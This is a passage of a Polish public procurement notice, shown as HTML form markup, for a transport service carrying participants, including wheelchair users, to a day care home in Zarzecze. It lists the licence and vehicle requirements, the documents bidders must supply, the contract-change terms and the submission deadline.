id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że posiada niezbędne uprawnienia do realizowania co najmniej przewozów krajowych zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym. Ocena spełnienia warunku nastąpi na podstawie złożonej przez Wykonawcę aktualnej licencji na wykonywanie co najmniej krajowego transportu drogowego w zakresie przewozu osób lub zezwolenia na wykonywanie zawodu przewoźnika drogowego.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">−	Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować sprawnymi technicznie, przystosowanymi do przewozu osób z niepełnosprawnościami, w tym osób poruszających się na wózku inwalidzkim ( w części I zamówienia 1 osoba na wózku inwalidzkim, w części II - 2 osoby na wózku inwalidzkim), tj. wyposażonymi w windę hydrauliczną lub podjazd dla wózków inwalidzkich, posiadającymi pasy bezpieczeństwa, pasy stabilizujące pozycję osoby niepełnosprawnej, środkami transportu do przewozu osób, w liczbie niezbędnej do wykonania zamówienia oraz nie starszych niż rok produkcji 2013. Ocena spełnienia warunku nastąpi na podstawie złożonego wykazu posiadanych pojazdów wraz z informacją o podstawie dysponowania tymi zasobami, odrębnie na poszczególne części zamówienia. Każdy pojazd musi posiadać aktualne dowody ubezpieczenia OC i NNW oraz dokument potwierdzający stan techniczny, dopuszczający do ruchu, zgodnie z obowiązującymi przepisami o warunkach technicznych pojazdów;−	warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże wykonanie co najmniej jednej usługi o charakterze i porównywalności z przedmiotem zamówienia tj. usługi polegającej na przewozie osób, wykonywanej w sposób regularny przez co najmniej 6 miesięcy, wykonanej w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, z podaniem jej rodzaju, daty wykonania oraz nazwy podmiotu, na rzecz którego usługa była/jest wykonywana, według Wykazu usług stanowiącego załącznik nr 7 do SIWZ</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">4)	Aktualny odpisu z właściwego rejestru lub z Centralnej Ewidencji Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną.W przypadku składania oferty przez spółkę cywilną Wykonawca musi złożyć oddzielnie zaświadczenia dla każdego ze wspólników oraz oddzielnie na spółkę;5)	Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnymi, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu;6)	Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnymi, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)	Aktualna licencja na wykonywanie co najmniej krajowego transportu drogowego w zakresie przewozu osób lub zezwolenia na wykonywanie zawodu przewoźnika drogowego. zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym;2)	Wykaz pojazdów dostępnych Wykonawcy, przeznaczonych do realizacji zamówienia wg wzoru stanowiącego załącznik nr 6 do SIWZ;3)	Wykaz zawierającego co najmniej jedną usługę o charakterze i porównywalności z przedmiotem zamówienia tj. usługę polegającą na przewozie osób, wykonywaną w sposób regularny przez co najmniej 6 miesięcy, a w przypadku świadczeń okresowych lub ciągłych również wykonywaną, wykonaną w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie, z podaniem jej rodzaju, daty wykonania oraz nazwy podmiotu, na rzecz którego usługa była wykonywana oraz załączeniem dowodów (dokumentów) potwierdzających, że wskazana w wykazie ww. usługa została wykonana w sposób należyty i prawidłowo ukończona, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.W przypadku składania oferty wspólnej Wykonawcy składają zgodnie z wyborem jeden wspólny wykaz lub oddzielne wykazy.Wykaz należy przygotować zgodnie ze wzorem określonym w załączniki nr 7 do SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności i mogą być dopuszczalne w granicach unormowania art. 144 ustawy Prawo zamówień publicznych.2.	Zamawiający dopuszcza takie zmiany w następujących przypadkach, gdy:1)	ulegnie zmianie stan prawny w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany sposobu wykonania zamówienia przez Wykonawcę;2)	wystąpią okoliczności skutkujące potrzebą zmiany terminu realizacji zamówienia, takie jak:a)	zmiana stanu prawnego w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany terminu;b)	gdy wystąpią przeszkody o obiektywnym charakterze (zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej), np. pogoda uniemożliwiająca wykonywanie umowy i inne zdarzenia, których przyczyny nie leżą po żadnej ze stron umowy, zdarzenia wywołane przez człowieka, np. działania wojenne czy gwałtowne rozruchy oraz akty władzy publicznej, którym należy się podporządkować, a także inne niemożliwe do przewidzenia przyczyny techniczne. Strony mają prawo do skorygowania uzgodnionych zobowiązań i przesunięcia terminu realizacji maksymalnie o czas trwania siły wyższej. Strony zobowiązują się do natychmiastowego poinformowania się nawzajem o wystąpieniu ww. przeszkód;c)	wystąpienie epidemii lub stanu zagrożenia epidemicznego – Strony umowy niezwłocznie, wzajemnie informują się o wpływie okoliczności związanych z wystąpieniem epidemii lub stanu zagrożenia epidemicznego na należyte wykonanie umowy, o ile taki wpływ wystąpił lub może wystąpić, wskazując konkretne okoliczności lub ograniczenia, w tym powołując podstawę prawną nałożonych ograniczeń. Wpływ ten musi zostać potwierdzony przez stronę umowy powołującą się na przedmiotową okoliczność. Potwierdzenie powinno nastąpić w formie oświadczenia lub dokumentów pochodzących m.in. od strony, instytucji publicznej lub podwykonawcy.3)	wystąpią okoliczności skutkujące potrzebą zmiany sposobu realizacji zamówienia z samodzielnej realizacji przez Wykonawcę, na realizację z udziałem podwykonawców, z zastrzeżeniem, że podwykonawcy będą posiadać właściwości niezbędne do realizacji zamówienia (dotyczy przypadku, w którym Wykonawca powierza wykonanie części zamówienia podwykonawcom), a także zmiany sposobu realizacji zamówienia z realizacji przy udziale podwykonawców na samodzielną realizację przez Wykonawcę;4)	nastąpi zmiana w wykazie pojazdów skierowanych do realizacji zamówienia, z zastrzeżeniem, że nowy pojazd spełnia warunki określone przez Zamawiającego określone w postępowaniu o udzielenie zamówienia publicznego; 5)	nastąpi konieczność dokonania zmian w godzinach przywozu i odwozu;6)	nastąpi zmiana liczby dowożonych osób oraz ich miejsc zamieszkania przez co zmieni się długość tras oraz zmianie ulegnie wynagrodzenie wykonawcy nie więcej niż o 20 %;7)	nastąpi zmiana stawki podatku od towarów i usług, wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z 4 października 2018 r. o pracowniczych planach kapitałowych - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Wynagrodzenie wykonawcy określone w umowie może ulec zmianom o kwotę wynikającą z tej zmiany.3.	Projekt umowy stanowi załącznik nr 5 do niniejszej SIWZ.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-10-16</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dowóz uczestników projektu do Dziennego Domu Pomocy w Zarzeczu - Trasa nr 1</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest świadczenie usługi transportowej w zakresie przewozu osób.2.	Transport 